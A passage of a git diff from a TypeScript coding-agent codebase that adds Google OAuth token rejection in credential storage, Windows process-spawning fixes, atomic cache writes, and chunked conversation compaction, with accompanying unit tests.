"sk-or-v1-env-key"; + const key = await storage.getApiKey("openrouter"); + assert.equal(key, "sk-or-v1-env-key"); + }); + + it("falls through to fallback resolver when openrouter has type:oauth credential", async (t) => { + const storage = inMemory({ + openrouter: { + type: "oauth", + access_token: "sk-or-v1-fake", + refresh_token: "rt-fake", + expires: Date.now() + 3_600_000, + }, + }); + + // Isolate from any real OPENROUTER_API_KEY so env fallback is skipped + // and the fallback resolver is reached. + const origEnv = process.env.OPENROUTER_API_KEY; + delete process.env.OPENROUTER_API_KEY; + t.after(() => { + if (origEnv === undefined) { + delete process.env.OPENROUTER_API_KEY; + } else { + process.env.OPENROUTER_API_KEY = origEnv; + } + }); + + storage.setFallbackResolver((provider) => + provider === "openrouter" ? "sk-or-v1-fallback" : undefined, + ); + + const key = await storage.getApiKey("openrouter"); + assert.equal(key, "sk-or-v1-fallback"); + }); +}); + +// ─── Gemini CLI OAuth token detection ───────────────────────────────────────── + +describe("AuthStorage — Gemini CLI OAuth token detection", () => { + it("rejects Google OAuth access token (ya29. prefix) stored as api_key for google provider", () => { + const storage = inMemory({}); + assert.throws( + () => storage.set("google", makeKey("ya29.a0ARrdaM_fake_oauth_token_from_gemini_cli")), + (err: Error) => { + assert.ok(err.message.includes("OAuth access token"), `Expected message about OAuth token, got: ${err.message}`); + assert.ok( + err.message.includes("GEMINI_API_KEY") || err.message.includes("google-gemini-cli"), + `Expected guidance about GEMINI_API_KEY or google-gemini-cli, got: ${err.message}`, + ); + return true; + }, + ); + }); + + it("rejects Google OAuth access token for google provider via getApiKey when set as env var", async () => { + const storage = inMemory({}); + // Simulate runtime override with OAuth token + storage.setRuntimeApiKey("google", "ya29.c.b0AXv0zTPQ_fake_oauth_token"); + const key = await storage.getApiKey("google"); + // Should return undefined (blocked) or throw + assert.equal(key, undefined, "OAuth token should be blocked for google provider"); + }); + + it("allows legitimate Google API keys (AIza prefix) for google provider", () => { + const storage = inMemory({}); + storage.set("google", makeKey("AIzaSyD_fake_legitimate_api_key_here")); + const creds = storage.getCredentialsForProvider("google"); + assert.equal(creds.length, 1); + }); + + it("allows ya29 tokens for google-gemini-cli provider (OAuth is expected there)", () => { + // google-gemini-cli stores OAuth credentials with type: "oauth", not "api_key" + // But if someone somehow stored an api_key, it shouldn't be blocked for OAuth providers + const storage = inMemory({}); + storage.set("google-gemini-cli", makeKey("ya29.a0ARrdaM_token_for_gemini_cli")); + const creds = storage.getCredentialsForProvider("google-gemini-cli"); + assert.equal(creds.length, 1); + }); + + it("rejects Google OAuth token (ya29. prefix) for openai provider that uses GEMINI_API_KEY indirectly", () => { + // Only google provider should be blocked, not others + const storage = inMemory({}); + // This should NOT throw - other providers can have whatever keys they want + storage.set("openai", makeKey("ya29.some_value")); + const creds = storage.getCredentialsForProvider("openai"); + assert.equal(creds.length, 1); + }); +}); + // ─── getAll truncation ──────────────────────────────────────────────────────── describe("AuthStorage — getAll()", () => { diff --git a/packages/pi-coding-agent/src/core/auth-storage.ts b/packages/pi-coding-agent/src/core/auth-storage.ts index e921328f2..fb1532252 100644 --- a/packages/pi-coding-agent/src/core/auth-storage.ts +++ b/packages/pi-coding-agent/src/core/auth-storage.ts @@ -34,6 +34,46 @@ export type OAuthCredential = { export type AuthCredential = ApiKeyCredential | OAuthCredential; +// ============================================================================ +// Google OAuth token detection +// ============================================================================ + +/** + * Providers that use Google AI Studio API keys (not OAuth tokens). + * OAuth access tokens (ya29.*) are not valid API keys for these providers. + */ +const GOOGLE_API_KEY_PROVIDERS = new Set(["google"]); + +/** + * Detect if a string is a Google OAuth access token rather than an API key. + * Google OAuth access tokens start with "ya29." — these are issued by + * Google's OAuth2 token endpoint and are not valid as AI Studio API keys. + * + * Users who installed Google's Gemini CLI may have these tokens and + * mistakenly set them as GEMINI_API_KEY. + */ +export function isGoogleOAuthToken(key: string): boolean { + return key.startsWith("ya29."); +} + +/** + * Validate that an API key is not a Google OAuth token being used for + * a provider that requires actual API keys (e.g., Google AI Studio). + * Throws a descriptive error if the key appears to be an OAuth token. + */ +function validateNotGoogleOAuthToken(provider: string, key: string): void { + if (GOOGLE_API_KEY_PROVIDERS.has(provider) && isGoogleOAuthToken(key)) { + throw new Error( + `The provided key for "${provider}" appears to be a Google OAuth access token (ya29.*), ` + + `not a valid API key. Google AI Studio requires an API key starting with "AIza...". ` + + `\n\nIf you're using Google's Gemini CLI, its OAuth tokens are not compatible. ` + + `Either:\n` + + ` 1. Get an API key from https://aistudio.google.com/apikey and set GEMINI_API_KEY\n` + + ` 2. Use '/login google-gemini-cli' to authenticate via Cloud Code Assist`, + ); + } +} + /** * On-disk format: each provider maps to a single credential or an array of credentials. * Single credentials are normalized to arrays at load time for internal use. @@ -202,6 +242,7 @@ export class AuthStorage { private fallbackResolver?: (provider: string) => string | undefined; private loadError: Error | null = null; private errors: Error[] = []; + private credentialChangeListeners: Set<() => void> = new Set(); /** * Round-robin index per provider. Incremented on each call to getApiKey @@ -263,6 +304,25 @@ export class AuthStorage { this.fallbackResolver = resolver; } + /** + * Register a callback to be notified when credentials change (e.g., after OAuth token refresh). + * Returns a function to unregister the listener. + */ + onCredentialChange(listener: () => void): () => void { + this.credentialChangeListeners.add(listener); + return () => this.credentialChangeListeners.delete(listener); + } + + private notifyCredentialChange(): void { + for (const listener of this.credentialChangeListeners) { + try { + listener(); + } catch { + // Don't let listener errors break the refresh flow + } + } + } + private recordError(error: unknown): void { const normalizedError = error instanceof Error ? error : new Error(String(error)); this.errors.push(normalizedError); @@ -340,6 +400,9 @@ export class AuthStorage { */ set(provider: string, credential: AuthCredential): void { if (credential.type === "api_key") { + // Block Google OAuth tokens being stored as API keys for AI Studio providers + validateNotGoogleOAuthToken(provider, credential.key); + const existing = this.getCredentialsForProvider(provider); // Deduplicate: don't add if same key already exists const isDuplicate = existing.some( @@ -667,6 +730,11 @@ export class AuthStorage { return { result: refreshed, next: JSON.stringify(merged, null, 2) }; }); + // Notify listeners after credential change (e.g., model registry refresh) + if (result) { + queueMicrotask(() => this.notifyCredentialChange()); + } + return result; } @@ -719,10 +787,34 @@ export class AuthStorage { * @param providerId - The provider to get an API key for * @param sessionId - Optional session ID for sticky credential selection */ - async getApiKey(providerId: string, sessionId?: string): Promise { + async getApiKey(providerId: string, sessionId?: string, options?: { baseUrl?: string }): Promise { + // If the model has a local baseUrl, return a dummy key to avoid auth blocking + if (options?.baseUrl) { + try { + const hostname = new URL(options.baseUrl).hostname; + if (hostname === "localhost" || hostname === "127.0.0.1" || hostname === "0.0.0.0" || hostname === "::1") { + return "local-no-key-needed"; + } + } catch { + if (options.baseUrl.startsWith("unix:")) { + return "local-no-key-needed"; + } + } + } + // Runtime override takes highest priority const runtimeKey = this.runtimeOverrides.get(providerId); if (runtimeKey) { + // Block Google OAuth tokens used as runtime API key overrides + if (GOOGLE_API_KEY_PROVIDERS.has(providerId) && isGoogleOAuthToken(runtimeKey)) { + this.recordError( + new Error( + `Blocked Google OAuth access token (ya29.*) for provider "${providerId}". ` + + `Use an API key from https://aistudio.google.com/apikey or '/login google-gemini-cli'.`, + ), + ); + return undefined; + } return runtimeKey; } @@ -731,14 +823,29 @@ export class AuthStorage { if (credentials.length > 0) { const index = this.selectCredentialIndex(providerId, credentials, sessionId); if (index >= 0) { - return this.resolveCredentialApiKey(providerId, credentials[index]); + const resolved = await this.resolveCredentialApiKey(providerId, credentials[index]); + if (resolved) return resolved; + // Credential unresolvable (e.g. type:"oauth" for a non-OAuth provider) — + // fall through to env / fallback instead of returning undefined (#2083) } - // All credentials backed off - fall through to env/fallback + // All credentials backed off or unresolvable - fall through to env/fallback } // Fall back to environment variable const envKey = getEnvApiKey(providerId); - if (envKey) return envKey; + if (envKey) { + // Block Google OAuth tokens from environment variables (e.g., GEMINI_API_KEY=ya29.*) + if (GOOGLE_API_KEY_PROVIDERS.has(providerId) && isGoogleOAuthToken(envKey)) { + this.recordError( + new Error( + `GEMINI_API_KEY contains a Google OAuth access token (ya29.*), not an API key. ` + + `Get an API key from https://aistudio.google.com/apikey or use '/login google-gemini-cli'.`, + ), + ); + return undefined; + } + return envKey; + } // Fall back to custom resolver (e.g., models.json custom providers) return this.fallbackResolver?.(providerId) ?? undefined; diff --git a/packages/pi-coding-agent/src/core/bash-executor.ts b/packages/pi-coding-agent/src/core/bash-executor.ts index 3931a7a25..f043b9379 100644 --- a/packages/pi-coding-agent/src/core/bash-executor.ts +++ b/packages/pi-coding-agent/src/core/bash-executor.ts @@ -76,11 +76,23 @@ export interface BashResult { * @param options - Optional streaming callback and abort signal * @returns Promise resolving to execution result */ -export function executeBash(command: string, options?: BashExecutorOptions): Promise { +export function executeBash(command: string, options?: BashExecutorOptions & { loginShell?: boolean }): Promise { return new Promise((resolve, reject) => { - const { shell, args } = getShellConfig(); + let shell: string; + let args: string[]; + if (options?.loginShell) { + // Use the user's login shell with -l for PATH/env from shell profiles + shell = process.env.SHELL || "/bin/bash"; + args = ["-l", "-c"]; + } else { + ({ shell, args } = getShellConfig()); + } + // On Windows, detached: true sets CREATE_NEW_PROCESS_GROUP which can + // cause EINVAL in VSCode/ConPTY terminal contexts. The bg-shell + // extension already guards this (process-manager.ts); align here. + // Process-tree cleanup uses taskkill /F /T on Windows regardless. const child: ChildProcess = spawn(shell, [...args, sanitizeCommand(command)], { - detached: true, + detached: process.platform !== "win32", env: getShellEnv(), stdio: ["ignore", "pipe", "pipe"], }); diff --git a/packages/pi-coding-agent/src/core/blob-store.ts b/packages/pi-coding-agent/src/core/blob-store.ts index 16262c892..9ad9e4f49 100644 --- a/packages/pi-coding-agent/src/core/blob-store.ts +++ b/packages/pi-coding-agent/src/core/blob-store.ts @@ -6,7 +6,7 @@ * provides automatic deduplication across sessions. */ import { createHash } from "node:crypto"; -import { mkdirSync, readdirSync, readFileSync, writeFileSync, existsSync, accessSync, unlinkSync, statSync } from "node:fs"; +import { mkdirSync, readdirSync, readFileSync, writeFileSync, accessSync, unlinkSync, statSync } from "node:fs"; import { join } from "node:path"; const BLOB_PREFIX = "blob:sha256:"; @@ -37,8 +37,11 @@ export class BlobStore { }, }; - if (!existsSync(blobPath)) { - writeFileSync(blobPath, data); + try { + writeFileSync(blobPath, data, { flag: "wx" }); // Atomic: fails if file exists + } catch (err: any) { + if (err.code !== "EEXIST") throw err; + // File already exists — expected for content-addressed storage } return result; } diff --git a/packages/pi-coding-agent/src/core/compaction-orchestrator.ts b/packages/pi-coding-agent/src/core/compaction-orchestrator.ts index 6415f8098..c17de356c 100644 --- a/packages/pi-coding-agent/src/core/compaction-orchestrator.ts +++ b/packages/pi-coding-agent/src/core/compaction-orchestrator.ts @@ -94,10 +94,11 @@ export class CompactionOrchestrator { throw new Error("No model selected"); } - const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId()); - if (!apiKey) { + if (!this._deps.modelRegistry.isProviderRequestReady(model.provider)) { throw new Error(`No API key for ${model.provider}`); } + // undefined for externalCli/none providers — stripped at the streamSimple boundary (model-registry.ts) + const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId()); const pathEntries = this._deps.sessionManager.getBranch(); const settings = this._deps.settingsManager.getCompactionSettings(); @@ -299,11 +300,12 @@ export class CompactionOrchestrator { return; } - const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId()); - if (!apiKey) { + if (!this._deps.modelRegistry.isProviderRequestReady(model.provider)) { this._deps.emit({ type: "auto_compaction_end", result: undefined, aborted: false, willRetry: false }); return; } + // undefined for externalCli/none providers — stripped at the streamSimple boundary (model-registry.ts) + const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId()); const pathEntries = this._deps.sessionManager.getBranch(); const preparation = prepareCompaction(pathEntries, settings); diff --git a/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts b/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts index c028dbbd8..cf9c8bc01 100644 --- a/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts +++ b/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts @@ -64,8 +64,8 @@ export interface CollectEntriesResult { export interface GenerateBranchSummaryOptions { /** Model to use for summarization */ model: Model; - /** API key for the model */ - apiKey: string; + /** API key for the model. Undefined for externalCli/none providers. */ + apiKey: string | undefined; /** Abort signal for cancellation */ signal: AbortSignal; /** Optional custom instructions for summarization */ diff --git a/packages/pi-coding-agent/src/core/compaction/compaction.test.ts b/packages/pi-coding-agent/src/core/compaction/compaction.test.ts new file mode 100644 index 000000000..1fb5a2db2 --- /dev/null +++ b/packages/pi-coding-agent/src/core/compaction/compaction.test.ts @@ -0,0 +1,236 @@ +/** + * Tests for chunked compaction fallback when messages exceed model context window. + * Regression test for #2932. + */ + +import assert from "node:assert/strict"; +import { describe, it, mock } from "node:test"; + +import type { AgentMessage } from "@gsd/pi-agent-core"; +import type { Model, AssistantMessage } from "@gsd/pi-ai"; + +import { generateSummary, estimateTokens, chunkMessages } from "./compaction.js"; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +/** Create a user message with approximately `tokenCount` tokens (chars = tokens * 4). */ +function makeUserMessage(tokenCount: number): AgentMessage { + const text = "x".repeat(tokenCount * 4); + return { role: "user", content: text } as unknown as AgentMessage; +} + +/** Create a mock model with a given context window. */ +function makeModel(contextWindow: number): Model { + return { + id: "test-model", + name: "Test Model", + api: "anthropic-messages", + provider: "anthropic", + baseUrl: "https://api.test", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow, + maxTokens: 4096, + } as Model; +} + +function makeFakeResponse(text: string): AssistantMessage { + return { + content: [{ type: "text", text }], + stopReason: "end_turn", + } as unknown as AssistantMessage; +} + +// --------------------------------------------------------------------------- +// chunkMessages tests +// --------------------------------------------------------------------------- + +describe("chunkMessages", () => { + it("returns a single chunk when messages fit in budget", () => { + const messages: AgentMessage[] = [ + makeUserMessage(1_000), + makeUserMessage(1_000), + ]; + const chunks = chunkMessages(messages, 100_000); + assert.equal(chunks.length, 1); + assert.equal(chunks[0].length, 2); + }); + + it("splits messages into multiple chunks when they exceed budget", () => { + const messages: AgentMessage[] = [ + makeUserMessage(50_000), + makeUserMessage(50_000), + makeUserMessage(50_000), + ]; + // Budget of 80k tokens means each 50k message gets its own chunk + // (or two fit together if budget allows) + const chunks = chunkMessages(messages, 80_000); + assert.ok(chunks.length > 1, `Expected multiple chunks, got ${chunks.length}`); + // All messages should be present across chunks + const totalMessages = chunks.reduce((sum, c) => sum + c.length, 0); + assert.equal(totalMessages, 3); + }); + + it("puts a single oversized message in its own chunk", () => { + const messages: AgentMessage[] = [ + makeUserMessage(200_000), // Way over any reasonable budget + ]; + const chunks = chunkMessages(messages, 80_000); + assert.equal(chunks.length, 1); + assert.equal(chunks[0].length, 1); + }); + + it("preserves message order across chunks", () => { + // Create messages with identifiable sizes + const messages: AgentMessage[] = [ + makeUserMessage(30_000), // ~30k tokens + makeUserMessage(30_000), + makeUserMessage(30_000), + makeUserMessage(30_000), + ]; + const chunks = chunkMessages(messages, 50_000); + // Reconstruct original order + const flat = chunks.flat(); + assert.equal(flat.length, 4); + for (let i = 0; i < flat.length; i++) { + assert.strictEqual(flat[i], messages[i], `Message ${i} should be in order`); + } + }); +}); + +// --------------------------------------------------------------------------- +// generateSummary chunked fallback tests +// --------------------------------------------------------------------------- + +describe("generateSummary — chunked fallback (#2932)", () => { + it("calls _completeFn multiple times when messages exceed model context window", async () => { + // Arrange: 3 messages of ~80k tokens each = ~240k total, model has 200k window + const messages: AgentMessage[] = [ + makeUserMessage(80_000), + makeUserMessage(80_000), + makeUserMessage(80_000), + ]; + const model = makeModel(200_000); + const reserveTokens = 16_384; + + // Verify our test setup: messages really do exceed the model window + let totalTokens = 0; + for (const m of messages) totalTokens += estimateTokens(m); + assert.ok( + totalTokens > model.contextWindow, + `Test setup: ${totalTokens} tokens should exceed ${model.contextWindow} context window`, + ); + + // Track calls + const calls: string[] = []; + const mockComplete = mock.fn(async (_model: any, context: any, _options: any) => { + const userMsg = context.messages?.[0]; + const text = + typeof userMsg?.content === "string" + ? userMsg.content + : userMsg?.content?.[0]?.text ?? ""; + + if (text.includes("")) { + calls.push("update"); + } else { + calls.push("initial"); + } + return makeFakeResponse("Summary of chunk"); + }); + + const summary = await generateSummary( + messages, + model, + reserveTokens, + undefined, // apiKey + undefined, // signal + undefined, // customInstructions + undefined, // previousSummary + mockComplete, // _completeFn override for testing + ); + + // Assert: should have called completeSimple more than once (chunked) + assert.ok( + mockComplete.mock.callCount() > 1, + `Expected multiple calls for chunked summarization, got ${mockComplete.mock.callCount()}`, + ); + + // First call should be an initial summary, subsequent should be updates + assert.equal(calls[0], "initial", "First chunk should use initial summarization prompt"); + for (let i = 1; i < calls.length; i++) { + assert.equal(calls[i], "update", `Chunk ${i + 1} should use update summarization prompt`); + } + + // Should return a non-empty summary + assert.ok(summary.length > 0, "Summary should not be empty"); + }); + + it("uses single-pass when messages fit within model context window", async () => { + const messages: AgentMessage[] = [ + makeUserMessage(10_000), + makeUserMessage(10_000), + ]; + const model = makeModel(200_000); + const reserveTokens = 16_384; + + // Verify test setup + let totalTokens = 0; + for (const m of messages) totalTokens += estimateTokens(m); + assert.ok( + totalTokens < model.contextWindow, + `Test setup: ${totalTokens} tokens should fit in ${model.contextWindow} context window`, + ); + + const mockComplete = mock.fn(async () => makeFakeResponse("Single pass summary")); + + await generateSummary(messages, model, reserveTokens, undefined, undefined, undefined, undefined, mockComplete); + + assert.equal( + mockComplete.mock.callCount(), + 1, + "Should use single-pass summarization when messages fit in context window", + ); + }); + + it("passes previousSummary through chunked summarization", async () => { + const messages: AgentMessage[] = [ + makeUserMessage(80_000), + makeUserMessage(80_000), + makeUserMessage(80_000), + ]; + const model = makeModel(200_000); + const reserveTokens = 16_384; + const previousSummary = "Previous session summary content"; + + const prompts: string[] = []; + const mockComplete = mock.fn(async (_model: any, context: any) => { + const userMsg = context.messages?.[0]; + const text = + typeof userMsg?.content === "string" + ? userMsg.content + : userMsg?.content?.[0]?.text ?? ""; + prompts.push(text); + return makeFakeResponse("Chunk summary"); + }); + + await generateSummary( + messages, + model, + reserveTokens, + undefined, + undefined, + undefined, + previousSummary, + mockComplete, + ); + + // First chunk should include the previousSummary + assert.ok( + prompts[0].includes(previousSummary), + "First chunk should incorporate the previousSummary", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/compaction/compaction.ts b/packages/pi-coding-agent/src/core/compaction/compaction.ts index 13e00a6d1..cd3183277 100644 --- a/packages/pi-coding-agent/src/core/compaction/compaction.ts +++ b/packages/pi-coding-agent/src/core/compaction/compaction.ts @@ -489,18 +489,111 @@ Use this EXACT format: Keep each section concise. Preserve exact file paths, function names, and error messages.`; +/** + * Split messages into chunks where each chunk's estimated token count + * stays within `maxTokensPerChunk`. A single message that exceeds the + * budget is placed alone in its own chunk (never dropped). + */ +export function chunkMessages(messages: AgentMessage[], maxTokensPerChunk: number): AgentMessage[][] { + const chunks: AgentMessage[][] = []; + let currentChunk: AgentMessage[] = []; + let currentTokens = 0; + + for (const msg of messages) { + const msgTokens = estimateTokens(msg); + + if (currentChunk.length > 0 && currentTokens + msgTokens > maxTokensPerChunk) { + // Current chunk is full — start a new one + chunks.push(currentChunk); + currentChunk = [msg]; + currentTokens = msgTokens; + } else { + currentChunk.push(msg); + currentTokens += msgTokens; + } + } + + if (currentChunk.length > 0) { + chunks.push(currentChunk); + } + + return chunks; +} + +/** Type for the completion function, allowing injection for tests. */ +type CompleteFn = typeof completeSimple; + /** * Generate a summary of the conversation using the LLM. * If previousSummary is provided, uses the update prompt to merge. + * + * When the messages exceed the model's context window, automatically + * falls back to chunked summarization: summarize the first chunk, + * then iteratively merge subsequent chunks using the update prompt. + * + * @param _completeFn - Internal override for testing; defaults to completeSimple. */ export async function generateSummary( currentMessages: AgentMessage[], model: Model, reserveTokens: number, - apiKey: string, + apiKey: string | undefined, signal?: AbortSignal, customInstructions?: string, previousSummary?: string, + _completeFn?: CompleteFn, +): Promise { + const complete = _completeFn ?? completeSimple; + + // Estimate total tokens for the messages to summarize + let totalTokens = 0; + for (const msg of currentMessages) { + totalTokens += estimateTokens(msg); + } + + // Overhead for the prompt framing, system prompt, and response budget + const promptOverhead = 4_000; + const maxTokens = Math.floor(0.8 * reserveTokens); + const maxInputTokens = (model.contextWindow || 200_000) - reserveTokens - promptOverhead; + + // If messages fit in the context window, use single-pass summarization + if (totalTokens <= maxInputTokens) { + return singlePassSummary(currentMessages, model, reserveTokens, apiKey, signal, customInstructions, previousSummary, complete); + } + + // Chunked fallback: split messages and iteratively summarize + const chunks = chunkMessages(currentMessages, maxInputTokens); + let runningSummary = previousSummary; + + for (let i = 0; i < chunks.length; i++) { + runningSummary = await singlePassSummary( + chunks[i], + model, + reserveTokens, + apiKey, + signal, + customInstructions, + runningSummary, + complete, + ); + } + + return runningSummary!; +} + +/** + * Single-pass summarization of messages using the LLM. + * If previousSummary is provided, uses the update prompt to merge. + */ +async function singlePassSummary( + currentMessages: AgentMessage[], + model: Model, + reserveTokens: number, + apiKey: string | undefined, + signal?: AbortSignal, + customInstructions?: string, + previousSummary?: string, + complete: CompleteFn = completeSimple, ): Promise { const maxTokens = Math.floor(0.8 * reserveTokens); @@ -526,7 +619,7 @@ export async function generateSummary( ? { maxTokens, signal, apiKey, reasoning: "high" as const } : { maxTokens, signal, apiKey }; - const response = await completeSimple( + const response = await complete( model, { systemPrompt: SUMMARIZATION_SYSTEM_PROMPT, messages: createSummarizationMessage(promptText) }, completionOptions, @@ -660,7 +753,7 @@ Be concise. Focus on what's needed to understand the kept suffix.`; export async function compact( preparation: CompactionPreparation, model: Model, - apiKey: string, + apiKey: string | undefined, customInstructions?: string, signal?: AbortSignal, ): Promise { @@ -732,7 +825,7 @@ async function generateTurnPrefixSummary( messages: AgentMessage[], model: Model, reserveTokens: number, - apiKey: string, + apiKey: string | undefined, signal?: AbortSignal, ): Promise { const maxTokens = Math.floor(0.5 * reserveTokens); // Smaller budget for turn prefix diff --git a/packages/pi-coding-agent/src/core/discovery-cache.ts b/packages/pi-coding-agent/src/core/discovery-cache.ts index a75633c2f..d9d9bded8 100644 --- a/packages/pi-coding-agent/src/core/discovery-cache.ts +++ b/packages/pi-coding-agent/src/core/discovery-cache.ts @@ -3,7 +3,7 @@ * Stores results at {agentDir}/discovery-cache.json with per-provider TTLs. */ -import { existsSync, mkdirSync, readFileSync, writeFileSync } from "fs"; +import { existsSync, mkdirSync, readFileSync, renameSync, writeFileSync } from "fs"; import { dirname, join } from "path"; import { getAgentDir } from "../config.js"; import { type DiscoveredModel, getDefaultTTL } from "./model-discovery.js"; @@ -35,6 +35,8 @@ export class ModelDiscoveryCache { } set(provider: string, models: DiscoveredModel[], ttlMs?: number): void { + // Re-read from disk to get the latest state before modifying + this.load(); this.data.entries[provider] = { models, fetchedAt: Date.now(), @@ -50,6 +52,8 @@ export class ModelDiscoveryCache { } clear(provider?: string): void { + // Re-read from disk to get the latest state before modifying + this.load(); if (provider) { delete this.data.entries[provider]; } else { @@ -89,7 +93,10 @@ export class ModelDiscoveryCache { if (!existsSync(dir)) { mkdirSync(dir, { recursive: true }); } - writeFileSync(this.cachePath, JSON.stringify(this.data, null, 2), "utf-8"); + // Atomic write: write to temp file then rename to avoid partial reads + const tmpPath = this.cachePath + ".tmp"; + writeFileSync(tmpPath, JSON.stringify(this.data, null, 2), "utf-8"); + renameSync(tmpPath, this.cachePath); } catch { // Silently ignore write failures (read-only FS, permissions, etc.) } diff --git a/packages/pi-coding-agent/src/core/exec.ts b/packages/pi-coding-agent/src/core/exec.ts index b7dd046c4..9d12e8c23 100644 --- a/packages/pi-coding-agent/src/core/exec.ts +++ b/packages/pi-coding-agent/src/core/exec.ts @@ -39,7 +39,9 @@ export async function execCommand( return new Promise((resolve) => { const proc = spawn(command, args, { cwd, - shell: false, + // On Windows, npm/npx/tsc etc. are .cmd scripts that require shell + // resolution. Without this, spawn fails with ENOENT or EINVAL (#2854). + shell: process.platform === "win32", stdio: ["ignore", "pipe", "pipe"], }); diff --git a/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts b/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts new file mode 100644 index 000000000..3796ab071 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts @@ -0,0 +1,77 @@ +// GSD-2 — Extension Manifest Tests +// Copyright (c) 2026 Jeremy McSpadden + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { mkdtempSync, mkdirSync, writeFileSync } from "node:fs"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; +import { readManifest, readManifestFromEntryPath } from "./extension-manifest.js"; + +describe("readManifest", () => { + it("returns null for missing directory", () => { + assert.equal(readManifest("/nonexistent/path"), null); + }); + + it("returns null for directory without manifest", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + assert.equal(readManifest(dir), null); + }); + + it("returns null for invalid JSON", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + writeFileSync(join(dir, "extension-manifest.json"), "not json{{{", "utf-8"); + assert.equal(readManifest(dir), null); + }); + + it("returns null for manifest missing required fields", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + writeFileSync( + join(dir, "extension-manifest.json"), + JSON.stringify({ id: "test", name: "test" }), + ); + assert.equal(readManifest(dir), null); + }); + + it("returns valid manifest", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + const manifest = { + id: "test-ext", + name: "Test Extension", + version: "1.0.0", + tier: "bundled", + requires: { platform: ">=2.29.0" }, + }; + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify(manifest)); + const result = readManifest(dir); + assert.equal(result?.id, "test-ext"); + assert.equal(result?.tier, "bundled"); + }); +}); + +describe("readManifestFromEntryPath", () => { + it("reads manifest from parent of entry path", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + const extDir = join(dir, "my-ext"); + mkdirSync(extDir); + writeFileSync( + join(extDir, "extension-manifest.json"), + JSON.stringify({ + id: "my-ext", + name: "My Extension", + version: "1.0.0", + tier: "community", + }), + ); + writeFileSync(join(extDir, "index.ts"), ""); + + const result = readManifestFromEntryPath(join(extDir, "index.ts")); + assert.equal(result?.id, "my-ext"); + assert.equal(result?.tier, "community"); + }); + + it("returns null when entry path parent has no manifest", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + assert.equal(readManifestFromEntryPath(join(dir, "index.ts")), null); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts b/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts new file mode 100644 index 000000000..673f5a410 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts @@ -0,0 +1,62 @@ +// GSD-2 — Extension Manifest: Types and reading for extension-manifest.json +// Copyright (c) 2026 Jeremy McSpadden + +import { existsSync, readFileSync } from "node:fs"; +import { dirname, join } from "node:path"; + +// ─── Types ────────────────────────────────────────────────────────────────── + +export interface ExtensionManifest { + id: string; + name: string; + version: string; + description: string; + tier: "core" | "bundled" | "community"; + requires: { platform: string }; + provides?: { + tools?: string[]; + commands?: string[]; + hooks?: string[]; + shortcuts?: string[]; + }; + dependencies?: { + extensions?: string[]; + runtime?: string[]; + }; +} + +// ─── Validation ───────────────────────────────────────────────────────────── + +function isManifest(data: unknown): data is ExtensionManifest { + if (typeof data !== "object" || data === null) return false; + const obj = data as Record; + return ( + typeof obj.id === "string" && + typeof obj.name === "string" && + typeof obj.version === "string" && + typeof obj.tier === "string" + ); +} + +// ─── Reading ──────────────────────────────────────────────────────────────── + +/** Read extension-manifest.json from a directory. Returns null if missing or invalid. */ +export function readManifest(extensionDir: string): ExtensionManifest | null { + const manifestPath = join(extensionDir, "extension-manifest.json"); + if (!existsSync(manifestPath)) return null; + try { + const raw = JSON.parse(readFileSync(manifestPath, "utf-8")); + return isManifest(raw) ? raw : null; + } catch { + return null; + } +} + +/** + * Given an entry path (e.g. `.../extensions/browser-tools/index.ts`), + * resolve the parent directory and read its manifest. + */ +export function readManifestFromEntryPath(entryPath: string): ExtensionManifest | null { + const dir = dirname(entryPath); + return readManifest(dir); +} diff --git a/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts b/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts new file mode 100644 index 000000000..30a4b667e --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts @@ -0,0 +1,134 @@ +// GSD-2 — Extension Sort Tests +// Copyright (c) 2026 Jeremy McSpadden + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { mkdtempSync, mkdirSync, writeFileSync } from "node:fs"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; +import { sortExtensionPaths } from "./extension-sort.js"; + +function createExtDir(base: string, id: string, deps?: string[]): string { + const dir = join(base, id); + mkdirSync(dir, { recursive: true }); + writeFileSync( + join(dir, "extension-manifest.json"), + JSON.stringify({ + id, + name: id, + version: "1.0.0", + tier: "bundled", + requires: { platform: ">=2.29.0" }, + ...(deps ? { dependencies: { extensions: deps } } : {}), + }), + ); + writeFileSync(join(dir, "index.ts"), `export default function() {}`); + return join(dir, "index.ts"); +} + +describe("sortExtensionPaths", () => { + it("returns empty for empty input", () => { + const result = sortExtensionPaths([]); + assert.deepEqual(result.sortedPaths, []); + assert.deepEqual(result.warnings, []); + }); + + it("sorts independent extensions alphabetically", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathC = createExtDir(base, "charlie"); + const pathA = createExtDir(base, "alpha"); + const pathB = createExtDir(base, "bravo"); + + const result = 